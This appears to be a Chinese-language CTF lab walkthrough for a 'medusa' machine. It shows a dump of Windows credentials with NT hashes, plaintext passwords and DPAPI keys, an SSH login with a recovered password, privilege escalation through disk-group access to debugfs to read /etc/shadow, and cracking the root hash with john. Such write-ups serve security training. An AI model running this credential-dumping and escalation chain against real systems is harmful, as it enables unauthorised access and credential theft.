logon_server MEDUSA-PC
logon_time 2023-01-17T13:59:06.967383+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1021
luid 1381468
 == MSV ==
  Username: numero6
  Domain: Medusa-PC
  LM: 3a9514532e68d1ade189cb5bf02b24bb
  NT: e28f0fd696fb69d3317f1927c9e8d15c
  SHA1: 8295426605ff734e2bf256b630d905983dd929b5
  DPAPI: NA
 == WDIGEST [15145c]==
  username numero6
  domainname Medusa-PC
  password n1mb3r_s1x
  password (hex)6e0031006d006200330072005f0073003100780000000000
 == Kerberos ==
  Username: numero6
  Domain: Medusa-PC
  Password: n1mb3r_s1x
  password (hex)6e0031006d006200330072005f0073003100780000000000
 == WDIGEST [15145c]==
  username numero6
  domainname Medusa-PC
  password n1mb3r_s1x
  password (hex)6e0031006d006200330072005f0073003100780000000000
 == TSPKG [15145c]==
  username numero6
  domainname Medusa-PC
  password n1mb3r_s1x
  password (hex)6e0031006d006200330072005f0073003100780000000000
 == DPAPI [15145c]==
  luid 1381468
  key_guid 05667fe6-e6a1-4e5d-ab98-d9ea9682dcf7
  masterkey 2bae1dc400a32522b6efe39fe24d7c253dc8c74bd1dfb890699f940be9a79fd6d6ef465cef7d0af4c70c9fa335065b178dd8cdbfa60f3dcd62e3e88d22521f2a
  sha1_masterkey ed4fb77971f735932fee0e9efd584e6d1bfb01e8

== LogonSession ==
authentication_id 1298068 (13ce94)
session_id 10
username ct0l4
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:58:42.033789+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1010
luid 1298068
 == MSV ==
  Username: ct0l4
  Domain: Medusa-PC
  LM: NA
  NT: c9bb6fbc746633a84652119bf544ebe3
  SHA1: 82848b1644602bd6a500625b37fd8ed14807fda8
  DPAPI: NA
 == WDIGEST [13ce94]==
  username ct0l4
  domainname Medusa-PC
  password b4ck3nd_pr0gr4m3r
  password (hex)6200340063006b0033006e0064005f007000720030006700720034006d0033007200000000000000
 == Kerberos ==
  Username: ct0l4
  Domain: Medusa-PC
  Password: b4ck3nd_pr0gr4m3r
  password (hex)6200340063006b0033006e0064005f007000720030006700720034006d0033007200000000000000
 == WDIGEST [13ce94]==
  username ct0l4
  domainname Medusa-PC
  password b4ck3nd_pr0gr4m3r
  password (hex)6200340063006b0033006e0064005f007000720030006700720034006d0033007200000000000000
 == TSPKG [13ce94]==
  username ct0l4
  domainname Medusa-PC
  password b4ck3nd_pr0gr4m3r
  password (hex)6200340063006b0033006e0064005f007000720030006700720034006d0033007200000000000000

== LogonSession ==
authentication_id 1000050 (f4272)
session_id 9
username LordP4
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:57:52.044531+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1020
luid 1000050
 == MSV ==
  Username: LordP4
  Domain: Medusa-PC
  LM: 787465d75fac19613c442716b42e315b
  NT: 4aef2b11d1bb6c7594c904035f611937
  SHA1: 3f872737266578b9c6678f42ae1fadc19f34b523
  DPAPI: NA
 == WDIGEST [f4272]==
  username LordP4
  domainname Medusa-PC
  password Wh1t3_h4ck
  password (hex)570068003100740033005f006800340063006b0000000000
 == Kerberos ==
  Username: LordP4
  Domain: Medusa-PC
  Password: Wh1t3_h4ck
  password (hex)570068003100740033005f006800340063006b0000000000
 == WDIGEST [f4272]==
  username LordP4
  domainname Medusa-PC
  password Wh1t3_h4ck
  password (hex)570068003100740033005f006800340063006b0000000000
 == TSPKG [f4272]==
  username LordP4
  domainname Medusa-PC
  password Wh1t3_h4ck
  password (hex)570068003100740033005f006800340063006b0000000000
 == DPAPI [f4272]==
  luid 1000050
  key_guid 5062c530-69ce-4bc9-8272-9db84b775b3c
  masterkey 6f53397764e60e283d112ce7da1b9425fced09e213b8c02044f28f9146928c8c91f5ddc7b586faa3d6b5896cd3ffd8f07991187ab9061ab32f111cdf3641f4e2
  sha1_masterkey 1c8549da2ab13f26fe19d46bfafbccb6b518c96a

== LogonSession ==
authentication_id 933125 (e3d05)
session_id 8
username sml
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:57:13.015234+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1014
luid 933125
 == MSV ==
  Username: sml
  Domain: Medusa-PC
  LM: 92cae3307cc9b39593e28745b8bf4ba6
  NT: 37da1ddba9ebe6b1b36651fd5280c6af
  SHA1: 4b1f807db4643e6529e1e591b572435384743e2d
  DPAPI: NA
 == WDIGEST [e3d05]==
  username sml
  domainname Medusa-PC
  password th3_b0ss
  password (hex)7400680033005f006200300073007300
 == Kerberos ==
  Username: sml
  Domain: Medusa-PC
  Password: th3_b0ss
  password (hex)7400680033005f006200300073007300
 == WDIGEST [e3d05]==
  username sml
  domainname Medusa-PC
  password th3_b0ss
  password (hex)7400680033005f006200300073007300
 == TSPKG [e3d05]==
  username sml
  domainname Medusa-PC
  password th3_b0ss
  password (hex)7400680033005f006200300073007300

== LogonSession ==
authentication_id 845877 (ce835)
session_id 7
username spectre
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:56:09.715430+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1004
luid 845877
 == MSV ==
  Username: spectre
  Domain: Medusa-PC
  LM: NA
  NT: 6ec779920e220c163f33101085eff0b9
  SHA1: 4d3341113c66127df14de8cc6ac7b4ebf52d74b5
  DPAPI: NA
 == WDIGEST [ce835]==
  username spectre
  domainname Medusa-PC
  password 5p3ctr3_p0is0n_xX
  password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
 == Kerberos ==
  Username: spectre
  Domain: Medusa-PC
  Password: 5p3ctr3_p0is0n_xX
  password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
 == WDIGEST [ce835]==
  username spectre
  domainname Medusa-PC
  password 5p3ctr3_p0is0n_xX
  password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
 == TSPKG [ce835]==
  username spectre
  domainname Medusa-PC
  password 5p3ctr3_p0is0n_xX
  password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000

== LogonSession ==
authentication_id 763754 (ba76a)
session_id 6
username RiJaba1
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:55:03.742773+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1003
luid 763754
 == MSV ==
  Username: RiJaba1
  Domain: Medusa-PC
  LM: NA
  NT: 139988f1c9a8a7cb6fb03762a6d510e7
  SHA1: ff33ab3051fc5bc0fafd7d1c266c062136a1f266
  DPAPI: NA
 == WDIGEST [ba76a]==
  username RiJaba1
  domainname Medusa-PC
  password littl3_h4ck3r_v2
  password (hex)6c006900740074006c0033005f006800340063006b00330072005f0076003200
 == Kerberos ==
  Username: RiJaba1
  Domain: Medusa-PC
  Password: littl3_h4ck3r_v2
  password (hex)6c006900740074006c0033005f006800340063006b00330072005f0076003200
 == WDIGEST [ba76a]==
  username RiJaba1
  domainname Medusa-PC
  password littl3_h4ck3r_v2
  password (hex)6c006900740074006c0033005f006800340063006b00330072005f0076003200
 == TSPKG [ba76a]==
  username RiJaba1
  domainname Medusa-PC
  password littl3_h4ck3r_v2
  password (hex)6c006900740074006c0033005f006800340063006b00330072005f0076003200

== LogonSession ==
authentication_id 682065 (a6851)
session_id 5
username jabatron
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:54:24.123633+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1008
luid 682065
 == MSV ==
  Username: jabatron
  Domain: Medusa-PC
  LM: 162b58d2300279d1b7f036d77017ce3e
  NT: 362e83945feaa2c874f39b670ef27deb
  SHA1: 60cd5410d0cf4659d2b6012e134ebb989a37a241
  DPAPI: NA
 == WDIGEST [a6851]==
  username jabatron
  domainname Medusa-PC
  password b1zum_3_AM
  password (hex)620031007a0075006d005f0033005f0041004d0000000000
 == Kerberos ==
  Username: jabatron
  Domain: Medusa-PC
  Password: b1zum_3_AM
  password (hex)620031007a0075006d005f0033005f0041004d0000000000
 == WDIGEST [a6851]==
  username jabatron
  domainname Medusa-PC
  password b1zum_3_AM
  password (hex)620031007a0075006d005f0033005f0041004d0000000000
 == TSPKG [a6851]==
  username jabatron
  domainname Medusa-PC
  password b1zum_3_AM
  password (hex)620031007a0075006d005f0033005f0041004d0000000000

== LogonSession ==
authentication_id 601672 (92e48)
session_id 4
username InfayerTS
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:52:52.583594+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1011
luid 601672
 == MSV ==
  Username: InfayerTS
  Domain: Medusa-PC
  LM: 09b8d9346bc2c8435c7e856a3bfa37de
  NT: 46a5b2901a6db08a0cb93a04dc6c1949
  SHA1: e0fab5eb95b7c356da9a8f4f0239b1a510fd12c6
  DPAPI: NA
 == WDIGEST [92e48]==
  username InfayerTS
  domainname Medusa-PC
  password UnD3sc0n0c1d0
  password (hex)55006e00440033007300630030006e0030006300310064003000000000000000
 == Kerberos ==
  Username: InfayerTS
  Domain: Medusa-PC
  Password: UnD3sc0n0c1d0
  password (hex)55006e00440033007300630030006e0030006300310064003000000000000000
 == WDIGEST [92e48]==
  username InfayerTS
  domainname Medusa-PC
  password UnD3sc0n0c1d0
  password (hex)55006e00440033007300630030006e0030006300310064003000000000000000
 == TSPKG [92e48]==
  username InfayerTS
  domainname Medusa-PC
  password UnD3sc0n0c1d0
  password (hex)55006e00440033007300630030006e0030006300310064003000000000000000

== LogonSession ==
authentication_id 526374 (80826)
session_id 3
username d4t4s3c
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:52:02.861914+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1013
luid 526374
 == MSV ==
  Username: d4t4s3c
  Domain: Medusa-PC
  LM: 375262b6e52fb3710decb7ba03fdea49
  NT: 6dd06920b7a4203d195f9f05084d6cb6
  SHA1: 65b498805e94b4546396f8bd7a9ee093e85f1594
  DPAPI: NA
 == WDIGEST [80826]==
  username d4t4s3c
  domainname Medusa-PC
  password br4in_br34k3r
  password (hex)62007200340069006e005f0062007200330034006b0033007200000000000000
 == Kerberos ==
  Username: d4t4s3c
  Domain: Medusa-PC
  Password: br4in_br34k3r
  password (hex)62007200340069006e005f0062007200330034006b0033007200000000000000
 == WDIGEST [80826]==
  username d4t4s3c
  domainname Medusa-PC
  password br4in_br34k3r
  password (hex)62007200340069006e005f0062007200330034006b0033007200000000000000
 == TSPKG [80826]==
  username d4t4s3c
  domainname Medusa-PC
  password br4in_br34k3r
  password (hex)62007200340069006e005f0062007200330034006b0033007200000000000000

== LogonSession ==
authentication_id 424519 (67a47)
session_id 2
username cromiphi
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:50:58.337500+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1005
luid 424519
 == MSV ==
  Username: cromiphi
  Domain: Medusa-PC
  LM: NA
  NT: e16a94ce4337564fbd00672ac12367fc
  SHA1: 4905a08610106fda3be33780dd1384a3fa326c4b
  DPAPI: NA
 == WDIGEST [67a47]==
  username cromiphi
  domainname Medusa-PC
  password br4in_br34k3r_v2
  password (hex)62007200340069006e005f0062007200330034006b00330072005f0076003200
 == Kerberos ==
  Username: cromiphi
  Domain: Medusa-PC
  Password: br4in_br34k3r_v2
  password (hex)62007200340069006e005f0062007200330034006b00330072005f0076003200
 == WDIGEST [67a47]==
  username cromiphi
  domainname Medusa-PC
  password br4in_br34k3r_v2
  password (hex)62007200340069006e005f0062007200330034006b00330072005f0076003200
 == TSPKG [67a47]==
  username cromiphi
  domainname Medusa-PC
  password br4in_br34k3r_v2
  password (hex)62007200340069006e005f0062007200330034006b00330072005f0076003200

== LogonSession ==
authentication_id 121589 (1daf5)
session_id 1
username Medusa
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:39:39.941406+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1001
luid 121589
 == MSV ==
  Username: Medusa
  Domain: Medusa-PC
  LM: 44efce164ab921caaad3b435b51404ee
  NT: 32ed87bdb5fdc5e9cba88547376818d4
  SHA1: 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
  DPAPI: NA
 == WDIGEST [1daf5]==
  username Medusa
  domainname Medusa-PC
  password 123456
  password (hex)31003200330034003500360000000000
 == Kerberos ==
  Username: Medusa
  Domain: Medusa-PC
  Password: 123456
  password (hex)31003200330034003500360000000000
 == WDIGEST [1daf5]==
  username Medusa
  domainname Medusa-PC
  password 123456
  password (hex)31003200330034003500360000000000
 == TSPKG [1daf5]==
  username Medusa
  domainname Medusa-PC
  password 123456
  password (hex)31003200330034003500360000000000

== LogonSession ==
authentication_id 121543 (1dac7)
session_id 1
username Medusa
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:39:39.941406+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1001
luid 121543
 == MSV ==
  Username: Medusa
  Domain: Medusa-PC
  LM: 44efce164ab921caaad3b435b51404ee
  NT: 32ed87bdb5fdc5e9cba88547376818d4
  SHA1: 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
  DPAPI: NA
 == WDIGEST [1dac7]==
  username Medusa
  domainname Medusa-PC
  password 123456
  password (hex)31003200330034003500360000000000
 == Kerberos ==
  Username: Medusa
  Domain: Medusa-PC
  Password: 123456
  password (hex)31003200330034003500360000000000
 == WDIGEST [1dac7]==
  username Medusa
  domainname Medusa-PC
  password 123456
  password (hex)31003200330034003500360000000000
 == TSPKG [1dac7]==
  username Medusa
  domainname Medusa-PC
  password 123456
  password (hex)31003200330034003500360000000000

== LogonSession ==
authentication_id 96251 (177fb)
session_id 0
username ANONYMOUS LOGON
domainname NT AUTHORITY
logon_server 
logon_time 2023-01-17T13:39:17.902344+00:00
sid S-1-5-7
luid 96251

== LogonSession ==
authentication_id 997 (3e5)
session_id 0
username SERVICIO LOCAL
domainname NT AUTHORITY
logon_server 
logon_time 2023-01-17T13:39:16.843750+00:00
sid S-1-5-19
luid 997
 == Kerberos ==
  Username: 
  Domain: 

== LogonSession ==
authentication_id 996 (3e4)
session_id 0
username MEDUSA-PC$
domainname WORKGROUP
logon_server 
logon_time 2023-01-17T13:39:16.828125+00:00
sid S-1-5-20
luid 996
 == WDIGEST [3e4]==
  username MEDUSA-PC$
  domainname WORKGROUP
  password None
  password (hex)
 == Kerberos ==
  Username: medusa-pc$
  Domain: WORKGROUP
 == WDIGEST [3e4]==
  username MEDUSA-PC$
  domainname WORKGROUP
  password None
  password (hex)

== LogonSession ==
authentication_id 23426 (5b82)
session_id 0
username 
domainname 
logon_server 
logon_time 2023-01-17T13:39:16.734375+00:00
sid None
luid 23426

== LogonSession ==
authentication_id 999 (3e7)
session_id 0
username MEDUSA-PC$
domainname WORKGROUP
logon_server 
logon_time 2023-01-17T13:39:16.718750+00:00
sid S-1-5-18
luid 999
 == WDIGEST [3e7]==
  username MEDUSA-PC$
  domainname WORKGROUP
  password None
  password (hex)
 == Kerberos ==
  Username: medusa-pc$
  Domain: WORKGROUP
 == WDIGEST [3e7]==
  username MEDUSA-PC$
  domainname WORKGROUP
  password None
  password (hex)
 == DPAPI [3e7]==
  luid 999
  key_guid c005befa-c2f2-4f70-bce6-9199e1b3d537
  masterkey 1b9c89f8747b31e23126511d184effa733f09c0425e813e4665825ae711043d75cd33d21718256b4f002b11e9b7ce8beba3a4d0d1524f64ae07c5b11450393ed
  sha1_masterkey 063fc03a751363d0b597b119a554c505d50d79fc
 == DPAPI [3e7]==
  luid 999
  key_guid 4ec4ace1-da38-4c23-b8bc-311167afd57a
  masterkey 3e15960063b911f90ac5b696d08f049475736477a581d9bd878a348866d29fb8c4b1e07a2de410240676b55460681c876e9ef23ce64ba3bb6a84a72fbcd0fb17
  sha1_masterkey 599b49e8537fa1be1dbd88441989ae8d4bd4054d
 == DPAPI [3e7]==
  luid 999
  key_guid 4834d175-165a-48f4-9ecc-fb22225c3972
  masterkey ea21228b08295250eb17cc72fb17926fca02688a4ce2542889bf2ee0908d615160e234f19c4964d0d31c58a5a74df4a1152f5328049b65090e887b78f9371bfd
  sha1_masterkey 28594cfa5204bc52e36106051cd28ab896522920
 == DPAPI [3e7]==
  luid 999
  key_guid f22e410f-f947-4e08-8f2a-8f65df603f8d
  masterkey 19c05880b67d50f8231cd8009836e3cdc55610e4877f8b976abd5ca15600d0e759934324c6204b56f02527039e7fc52a1dfb5296d3381aaa7c3eb610dffa32fa
  sha1_masterkey b859b2b52e7e49cf5c70069745c88853c4b23487

得到了spectre的用户密码,进行ssh登录

复制代码
┌──(kali㉿kali)-[~]
└─$ ssh spectre@192.168.21.6            
The authenticity of host '192.168.21.6 (192.168.21.6)' can't be established.
ED25519 key fingerprint is SHA256:YlA89tgUj1yicAk2Jpgi9F7UcnKVFzD/vTI4sla0JJE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.21.6' (ED25519) to the list of known hosts.
spectre@192.168.21.6's password: 
Linux medusa 5.10.0-20-amd64 #1 SMP Debian 5.10.158-2 (2022-12-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jan 21 14:57:30 2023 from 192.168.1.13
spectre@medusa:~$

看一下都有什么

复制代码
spectre@medusa:~$ ls -la
total 32
drwxr-xr-x 3 spectre spectre 4096 Jan 18  2023 .
drwxr-xr-x 3 root    root    4096 Jan 15  2023 ..
-rw------- 1 spectre spectre  197 Jan 21  2023 .bash_history
-rw-r--r-- 1 spectre spectre  220 Jan 15  2023 .bash_logout
-rw-r--r-- 1 spectre spectre 3526 Jan 15  2023 .bashrc
drwxr-xr-x 3 spectre spectre 4096 Jan 18  2023 .local
-rw-r--r-- 1 spectre spectre  807 Jan 15  2023 .profile
-rw------- 1 spectre spectre   44 Jan 18  2023 user.txt
spectre@medusa:~$ sudo -l
sudo: unable to resolve host medusa: Name or service not known
[sudo] password for spectre: 
Sorry, user spectre may not run sudo on medusa.
spectre@medusa:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/mount
/usr/bin/su
spectre@medusa:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep
spectre@medusa:~$ id
uid=1000(spectre) gid=1000(spectre) groups=1000(spectre),6(disk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

提权

复制代码
spectre@medusa:~$ df -h
Filesystem      Size  Used Avail Use% Mounted on
udev            471M     0  471M   0% /dev
tmpfs            98M  512K   98M   1% /run
/dev/sda1       6.9G  6.5G     0 100% /
tmpfs           489M     0  489M   0% /dev/shm
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs            98M     0   98M   0% /run/user/1000
spectre@medusa:~$ find / -name debugfs 2>/dev/null
/usr/sbin/debugfs
spectre@medusa:~$ /usr/sbin/debugfs -w /dev/sda1
debugfs 1.46.2 (28-Feb-2021)
debugfs:  cat /etc/shadow
root:$y$j9T$AjVXCCcjJ6jTodR8BwlPf.$4NeBwxOq4X0/0nCh3nrIBmwEEHJ6/kDU45031VFCWc2:19375:0:99999:7:::
daemon:*:19372:0:99999:7:::
bin:*:19372:0:99999:7:::
sys:*:19372:0:99999:7:::
sync:*:19372:0:99999:7:::
games:*:19372:0:99999:7:::
man:*:19372:0:99999:7:::
lp:*:19372:0:99999:7:::
mail:*:19372:0:99999:7:::
news:*:19372:0:99999:7:::
uucp:*:19372:0:99999:7:::
proxy:*:19372:0:99999:7:::
www-data:*:19372:0:99999:7:::
backup:*:19372:0:99999:7:::
list:*:19372:0:99999:7:::
irc:*:19372:0:99999:7:::
gnats:*:19372:0:99999:7:::
nobody:*:19372:0:99999:7:::
_apt:*:19372:0:99999:7:::
systemd-network:*:19372:0:99999:7:::
systemd-resolve:*:19372:0:99999:7:::
messagebus:*:19372:0:99999:7:::
systemd-timesync:*:19372:0:99999:7:::
sshd:*:19372:0:99999:7:::
spectre:$y$j9T$4TeFHbjRqRC9royagYTTJ/$KnU7QK1u0/5fpHHqE/ehPe6uqpwbs6vuvcQQH4EF9ZB:19374:0:99999:7:::
systemd-coredump:!*:19372::::::
ftp:*:19372:0:99999:7:::
┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt root.txt --format=crypt
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
andromeda        (root)     
1g 0:00:00:14 DONE (2025-07-22 13:55) 0.06968g/s 260.9p/s 260.9c/s 260.9C/s 19871987..street
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
spectre@medusa:~$ su root
Password: 
root@medusa:/home/spectre# id
uid=0(root) gid=0(root) groups=0(root)
相关推荐
枷锁—sha11 小时前
【SRC】SQL注入WAF 绕过应对策略(二)
网络·数据库·python·sql·安全·网络安全
天荒地老笑话么19 小时前
静态 IP 规划:掩码/网关/DNS 的正确组合
网络·网络协议·tcp/ip·网络安全
大方子2 天前
【PolarCTF】rce1
网络安全·polarctf
枷锁—sha2 天前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南
网络·安全·网络安全
聚铭网络2 天前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位
网络安全
darkb1rd2 天前
八、PHP SAPI与运行环境差异
开发语言·网络安全·php·webshell
世界尽头与你2 天前
(修复方案)基础目录枚举漏洞
安全·网络安全·渗透测试
枷锁—sha3 天前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1193 天前
3.1_网络——基础
网络·安全·web安全·http·网络安全
ESBK20253 天前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信